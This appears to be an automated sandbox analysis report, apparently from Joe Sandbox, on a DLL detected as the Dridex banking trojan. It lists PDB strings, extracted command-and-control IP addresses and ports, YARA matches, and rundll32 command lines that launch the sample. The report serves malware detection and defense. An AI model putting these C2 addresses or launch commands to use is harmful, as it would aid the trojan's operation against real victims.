                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb2 source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb|q source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: dnsapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: rasapi32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdbR source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb& source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdbT source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: ClusApi.pdbt source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb3 source: WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb=d source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 0000000C.00000003.423735765.0000000002A8C000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.588098874.0000000002E9B000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.588684577.000000000338D000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb* source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: dnsapi.pdbpq source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdbbq source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb|% source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb0 source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: sfc_os.pdb5 source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdbq source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb( source: WerFault.exe, 0000000C.00000003.423542715.0000000002A86000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.588054272.0000000002E95000.00000004.00000001.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdbe source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 0000000C.00000003.423591311.0000000002A98000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.588185425.0000000002EA7000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.589251650.0000000003399000.00000004.00000001.sdmp
                      Source: Binary string: rasapi32.pdbvq source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 193.200.130.181:443
                      Source: Malware configuration extractorIPs: 95.138.161.226:2303
                      Source: Malware configuration extractorIPs: 167.114.113.13:4125
                      Source: Joe Sandbox ViewIP Address: 167.114.113.13 167.114.113.13
                      Source: Joe Sandbox ViewIP Address: 95.138.161.226 95.138.161.226
                      Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
                      Source: Joe Sandbox ViewASN Name: RACKSPACE-LONGB RACKSPACE-LONGB
                      Source: WerFault.exe, 0000001C.00000003.648753130.0000000005092000.00000004.00000001.sdmpString found in binary or memory: http://crl.micro
                      Source: WerFault.exe, 0000001B.00000003.645645354.0000000004C20000.00000004.00000001.sdmpString found in binary or memory: http://crl.micro8
                      Source: WerFault.exe, 0000001E.00000003.646412621.0000000002A79000.00000004.00000001.sdmpString found in binary or memory: http://crl.microH

                      E-Banking Fraud:

                      barindex
                      Yara detected Dridex unpacked fileShow sources
                      Source: Yara matchFile source: 00000010.00000002.578383295.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000D.00000002.659180073.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.599608439.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.660063361.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.578360981.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.663523541.0000000010001000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 15.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 13.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.10000000.3.unpack, type: UNPACKEDPE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100014943_2_10001494
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100114603_2_10011460
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000846C3_2_1000846C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000A52C3_2_1000A52C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10011D583_2_10011D58
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100193483_2_10019348
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100107543_2_10010754
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100090CC3_2_100090CC
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 764
                      Source: 3c271eae_by_Libranalysis.dllBinary or memory string: OriginalFilenamej2pcsc.dllN vs 3c271eae_by_Libranalysis.dll
                      Source: 3c271eae_by_Libranalysis.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_1790f1d2\Report.wer, type: DROPPEDMatched rule: SUSP_WER_Critical_HeapCorruption date = 2019-10-18, author = Florian Roth, description = Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), reference = https://twitter.com/cyb3rops/status/1185459425710092288, score =
                      Source: C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_1d91dafffd792f9b512ff42d10d3dd5f24a3f5de_82810a17_01d168c7\Report.wer, type: DROPPEDMatched rule: SUSP_WER_Critical_HeapCorruption date = 2019-10-18, author = Florian Roth, description = Detects a crashed application that crashed due to a heap corruption error (could be a sign of exploitation), reference = https://twitter.com/cyb3rops/status/1185459425710092288, score =
                      Source: 3c271eae_by_Libranalysis.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: classification engineClassification label: mal76.troj.evad.winDLL@22/20@0/3
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5492
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5100
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5648
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess644
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6004
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\WERD297.tmpJump to behavior
                      Source: 3c271eae_by_Libranalysis.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll,LoxmtYt
                      Source: 3c271eae_by_Libranalysis.dllMetadefender: Detection: 21%
                      Source: 3c271eae_by_Libranalysis.dllReversingLabs: Detection: 27%
                      Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll'
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',#1
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll,LoxmtYt
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',#1
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5648 -s 764
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5100 -s 888
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',DllCanUnloadNow
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',DllGetClassObject
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiAddFileToInstance
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiAddParameter
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiCancel
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 644 -s 752
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6004 -s 756
                      Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5492 -s 764
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',#1Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll,LoxmtYtJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',DllCanUnloadNowJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',DllGetClassObjectJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiAddFileToInstanceJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiAddParameterJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',WdiCancelJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\3c271eae_by_Libranalysis.dll',#1Jump to behavior
                      Source: 3c271eae_by_Libranalysis.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: 3c271eae_by_Libranalysis.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: dnsapi.pdbF source: WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp
                      Source: Binary string: rasman.pdbnq source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.424911525.0000000002A92000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.590103743.0000000002EA1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.592752094.00000000047CB000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdb#dc source: WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb, source: WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.511740943.0000000004DE2000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.605759791.00000000051F1000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000009.00000003.427375651.0000000005180000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.517865960.0000000004DE0000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605811960.00000000051C0000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606439459.00000000055B0000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609305997.0000000004C30000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000009.00000003.427340993.0000000004FF1000.00000004.00000001.sdmp, WerFault.exe, 0000000C.00000003.508553143.0000000004E11000.00000004.00000001.sdmp, WerFault.exe, 0000001B.00000003.588098874.0000000002E9B000.00000004.00000001.sdmp, WerFault.exe, 0000001C.00000003.606391797.00000000055E1000.00000004.00000001.sdmp, WerFault.exe, 0000001E.00000003.609217077.0000000004C61000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb! source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb~ source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000009.00000003.427384192.0000000005186000.00000004.00000040.sdmp, WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp, WerFault.exe, 0000001B.00000003.605850778.00000000051C6000.00000004.00000040.sdmp, WerFault.exe, 0000001C.00000003.606466131.00000000055B6000.00000004.00000040.sdmp, WerFault.exe, 0000001E.00000003.609386178.0000000004C36000.00000004.00000040.sdmp
                      Source: Binary string: opengl32.pdbl source: WerFault.exe, 0000000C.00000003.513207382.0000000004DE8000.00000004.00000040.sdmp
